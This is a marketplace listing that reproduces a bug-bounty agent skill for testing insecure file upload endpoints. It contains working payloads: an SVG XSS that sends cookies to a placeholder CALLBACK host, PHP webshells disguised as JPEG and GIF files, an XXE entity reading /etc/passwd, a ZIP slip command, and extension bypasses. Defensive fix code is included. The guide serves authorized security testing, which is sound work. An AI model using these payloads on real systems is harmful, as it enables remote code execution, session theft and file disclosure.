agentsclimarketplace

Insecure file upload

Skill ShulkwiSEC/bb-huge/skills/curated/insecure-file-upload

bb-huge πŸ€— , Personal bug bounty findings hub and bug bounty orchestration for multiple agents

Install
npx -y skills add ShulkwiSEC/bb-huge --skill insecure-file-upload

Assembled from the repository path, not quoted from the project. Check it against their README if it does not work.

One thing to look at

  • 18 stars18 stars. Stars are a popularity signal and not a quality one, but at this level it is likely that nobody has read this closely except its author, and you would be relying on your own review.

What its author says it does

Copied from the file, not written here

Use when testing file upload endpoints for unrestricted file upload, MIME type bypass, magic byte spoofing, polyglot files, SVG XSS, XXE via Office documents, ZIP slip, and path traversal in filenames. Trigger on: multipart/form-data endpoints, avatar/document upload flows, import-from-file features, profile image, CSV/Excel import, DOCX/XLSX parsing, image resizing pipelines, archive extraction, and any endpoint that stores or serves user-supplied files. Detects extension bypass (shell.php.jpg), null byte injection, double extension, ImageMagick exploits, and content-type confusion.

The file declares its own license as Apache-2.0. That is the author’s claim about this one file, and it is not the same thing as the license GitHub reports for the repository, which is listed with the other numbers below.

SKILL.md

5.6 KB, as published. Nobody here has run it

Insecure File Upload

What Is Broken and Why

File upload endpoints that validate file type only by extension or Content-Type header allow attackers to upload executable files, XSS payloads, XXE-triggering documents, or path-traversal archives. Depending on where files are stored and served, impact ranges from stored XSS to full remote code execution.

Key Signals

  • multipart/form-data POST endpoints accepting user files
  • File extensions accepted beyond images/docs (or poorly validated)
  • Server echoes original filename in response or URL
  • Files served from same origin as application (not separate CDN/domain)
  • Archive extraction features (ZIP, tar)
  • Office document processing (DOCX, XLSX, PPTX β€” all ZIP+XML internally)
  • Image processing pipelines (ImageMagick, Pillow, libvips)

Methodology

  1. Upload a valid file; note the URL/path where it's stored and served.
  2. Check if files are served from same origin (XSS scope) or separate domain.
  3. Attempt extension bypass: shell.php.jpg, shell.php%00.jpg, shell.jpg.php.
  4. Modify Content-Type to image/jpeg while uploading a PHP/JSP file.
  5. Prepend valid magic bytes to malicious content; attempt upload.
  6. Test SVG upload β€” inject <svg onload="..."> for XSS.
  7. Test DOCX/XLSX upload with XXE payload inside XML.
  8. For archive extraction: craft ZIP with ../ paths (ZIP slip).
  9. Check if filename is reflected anywhere β€” test for path traversal and injection.

Payloads & Tools

# SVG XSS
<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('https://CALLBACK/?c='+document.cookie)"/>

# PHP webshell disguised as JPEG (magic bytes prepend)
printf '\xff\xd8\xff\xe0' > shell.php.jpg
echo '<?php system($_GET["cmd"]); ?>' >> shell.php.jpg

# Null byte bypass (older systems)
filename: shell.php%00.jpg

# XXE in DOCX β€” inject into word/document.xml inside the archive
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>

# ZIP slip
zip --symlinks traversal.zip ../../etc/passwd

# Polyglot GIF+PHP
GIF89a<?php system($_GET['cmd']); ?>

Magic bytes reference:

TypeHex
JPEGFF D8 FF
PNG89 50 4E 47 0D 0A 1A 0A
GIF47 49 46 38
PDF25 50 44 46
ZIP/DOCX50 4B 03 04

Bypass Techniques

AttackTechnique
Extension bypassshell.php.jpg β€” server splits on first dot
Double extensionshell.jpg.php β€” server uses last extension
Null byteshell.php%00.jpg β€” older parsers truncate at null
MIME spoofContent-Type: image/jpeg on PHP file
Magic byte prependPrefix file with valid JPEG/GIF header bytes
PolyglotFile valid as both JPEG and PHP simultaneously
SVG with JSXML-based, browsers execute onload from same origin
XXE in OfficeDOCX/XLSX are ZIP+XML; inject DTD in contained XML
ZIP slipArchive paths containing ../ extract outside intended dir
Content-type sniffOmit Content-Type; let browser sniff β€” bypass nosniff-less servers

Exploitation Scenarios

Stored XSS via SVG: Setup β†’ Application accepts SVG avatar uploads, serves them from same origin. Trigger β†’ Upload SVG with <svg onload="fetch('https://CALLBACK/?c='+document.cookie)">. Impact β†’ Any user viewing the avatar triggers XSS; session tokens exfiltrated.

RCE via PHP upload: Setup β†’ PHP application accepts image uploads, validates only Content-Type header. Trigger β†’ Upload shell.php with Content-Type: image/jpeg; access via direct URL. Impact β†’ Remote command execution on server.

XXE via XLSX import: Setup β†’ Application parses Excel files for data import. Trigger β†’ Upload crafted XLSX with XXE payload in sheet XML referencing internal files. Impact β†’ Server-side file read; possible SSRF to internal metadata endpoints.

False Positives

  • Upload endpoints that store files outside webroot and never serve them directly β€” RCE risk is mitigated, but XXE/ZIP slip may still apply.
  • Files renamed server-side to random UUIDs β€” original extension irrelevant for stored XSS but magic byte and content validation still matters.

Fix Patterns

# Validate magic bytes, not just extension
import magic
allowed_mimes = {'image/jpeg', 'image/png', 'image/gif'}
detected = magic.from_buffer(file.read(2048), mime=True)
if detected not in allowed_mimes:
    raise ValueError("Invalid file type")

# Always rename to UUID; never use original filename
import uuid, os
ext_map = {'image/jpeg': '.jpg', 'image/png': '.png'}
safe_name = str(uuid.uuid4()) + ext_map[detected]

Related Skills

XXE payloads embedded in DOCX/XLSX connect directly to [[xxe]]. SVG XSS from same-origin uploads is [[xss-stored]]. Path traversal in zip extraction is [[path-traversal]]. If the upload URL is fetched server-side, pivot to [[ssrf]].

Keep looking

Skills are one crate of 328,083. Ordering is by how many stacks a row turns up in, so the top of any crate is what has actually been picked rather than what has the most stars.